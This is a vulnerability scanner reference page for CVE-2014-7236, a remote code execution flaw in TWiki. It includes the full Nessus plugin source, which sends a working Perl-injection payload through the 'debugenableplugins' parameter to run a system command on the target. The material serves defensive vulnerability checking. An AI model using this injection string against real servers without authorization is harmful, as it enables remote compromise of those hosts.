TWiki 'debugenableplugins' Parameter RCE - Nessus

High   Plugin ID: 82898

This page contains detailed information about the TWiki 'debugenableplugins' Parameter RCE Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 82898
Name: TWiki 'debugenableplugins' Parameter RCE
Filename: twiki_debugenableplugins_rce.nasl
Vulnerability Published: 2014-10-09
This Plugin Published: 2015-04-20
Last Modification Time: 2022-04-11
Plugin Version: 1.11
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: os_fingerprint.nasl, twiki_detect.nasl
Required KB Items [?]: installed_sw/TWiki

Vulnerability Information


Severity: High
Vulnerability Published: 2014-10-09
Patch Published: 2014-10-09
CVE [?]: CVE-2014-7236
CPE [?]: cpe:/a:twiki:twiki

Synopsis

The remote web server hosts a CGI script that is affected by a remote code execution vulnerability.

Description

The version of TWiki installed on the remote host is affected by a remote code execution vulnerability due to a failure to properly sanitize user-supplied input to the 'debugenableplugins' parameter upon submission to the 'view' script. A remote, unauthenticated attacker can exploit this issue to execute arbitrary Perl code subject to the privileges of the web server user id.

Note that the application is reportedly also affected by a file upload vulnerability when installed on Windows hosts; however, Nessus has not tested for this issue.

Solution

Upgrade to TWiki version 6.0.1 or later. Alternatively, apply the hotfix referenced in the vendor advisory.

Public Exploits


Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, D2 Elliot)
Exploit Ease: No exploit is required

Here's the list of publicly known exploits and PoCs for verifying the TWiki 'debugenableplugins' Parameter RCE vulnerability:

  1. Metasploit: exploit/unix/http/twiki_debug_plugins
    [TWiki Debugenableplugins Remote Code Execution]
  2. Exploit-DB: exploits/php/remote/36438.rb
    [EDB-36438: TWiki Debugenableplugins - Remote Code Execution (Metasploit)]
  3. GitHub: https://github.com/m0nad/CVE-2014-7236_Exploit
    [CVE-2014-7236: Exploit for CVE-2014-7236]
  4. D2 Elliot: twiki_debugenableplugins_rce.html
    [TWiki debugenableplugins RCE]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source [?]: CVE-2014-7236
CVSS V2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:OF/RC:C
CVSS Base Score:7.5 (High)
Impact Subscore:6.4
Exploitability Subscore:10.0
CVSS Temporal Score:6.2 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:6.2 (Medium)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C
CVSS Base Score:8.8 (High)
Impact Subscore:5.9
Exploitability Subscore:2.8
CVSS Temporal Score:8.2 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.2 (High)

Go back to menu.

Plugin Source


This is the twiki_debugenableplugins_rce.nasl nessus plugin source code. This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(82898);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2014-7236");
  script_bugtraq_id(70372);

  script_name(english:"TWiki 'debugenableplugins' Parameter RCE");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a CGI script that is affected by a remote
code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of TWiki installed on the remote host is affected by a
remote code execution vulnerability due to a failure to properly
sanitize user-supplied input to the 'debugenableplugins' parameter
upon submission to the 'view' script. A remote, unauthenticated 
attacker can exploit this issue to execute arbitrary Perl code subject
to the privileges of the web server user id.

Note that the application is reportedly also affected by a file upload
vulnerability when installed on Windows hosts; however, Nessus has not
tested for this issue.");
  script_set_attribute(attribute:"see_also", value:"http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01");
  script_set_attribute(attribute:"see_also", value:"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236");
  script_set_attribute(attribute:"solution", value:
"Upgrade to TWiki version 6.0.1 or later. Alternatively, apply the
hotfix referenced in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-7236");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"TWiki debugenableplugins RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'TWiki Debugenableplugins Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/10/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/10/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/04/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:twiki:twiki");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("twiki_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("installed_sw/TWiki");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "TWiki";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

if ("cgi-bin" >!< dir)
{
  dir = ereg_replace(pattern:"(/[^/]+/).*", string:dir, replace:"\1");
  dir = dir + "bin/";
}
else
  dir = dir - "view";

# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';

  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Windows IP Configuration|(Subnet Mask|IP(v(4|6))? Address)[\. ]*:";

foreach cmd (cmds)
{

  url = "view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint"+
   '("Content-Type:text/html\\r\\n\\r\\n")%3bsystem('+"'"+cmd+"')%3bexit";

  res = http_send_recv3(
    method       : "GET",
    item         : dir + url,
    port         : port,
    exit_on_fail : TRUE
  );

  if (egrep(pattern:cmd_pats[cmd], string:res[2]))
  {
    vuln = TRUE;
    break;
  }
}

if (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  cmd         : cmd,
  line_limit  : 2,
  request     : make_list(build_url(qs:dir+url, port:port)),
  output      : chomp(res[2])
);
exit(0);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/twiki_debugenableplugins_rce.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\twiki_debugenableplugins_rce.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/twiki_debugenableplugins_rce.nasl

Go back to menu.

How to Run


Here is how to run the TWiki 'debugenableplugins' Parameter RCE as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select TWiki 'debugenableplugins' Parameter RCE plugin ID 82898.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl twiki_debugenableplugins_rce.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a twiki_debugenableplugins_rce.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - twiki_debugenableplugins_rce.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state twiki_debugenableplugins_rce.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 78816 - FreeBSD : twiki -- remote Perl code execution (21ce1840-6107-11e4-9e84-0022156e8794)
  • 63399 - TWiki < 5.1.3 Multiple Vulnerabilities
  • 22123 - TWiki configure Script Arbitrary Command Execution
  • 34031 - TWiki bin/configure 'image' Parameter Traversal Arbitrary File Access/Execution
  • 19704 - TWiki 'rev' Parameter Arbitrary Command Execution
  • 34246 - Debian DSA-1639-1 : twiki - command execution
  • 34206 - FreeBSD : twiki -- Arbitrary code execution in session files (9227dcaf-827f-11dd-9cd7-0050568452ac)
  • 36281 - FreeBSD : twiki -- arbitrary shell command execution (b4af3ede-36e9-11d9-a9e7-0001020eed82)
  • 35286 - FreeBSD : twiki -- multiple vulnerabilities (f98dea27-d687-11dd-abd1-0050568452ac)
  • 15827 - GLSA-200411-33 : TWiki: Arbitrary command execution

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file twiki_debugenableplugins_rce.nasl version 1.11. For more plugins, visit the Nessus Plugin Library.

Go back to menu.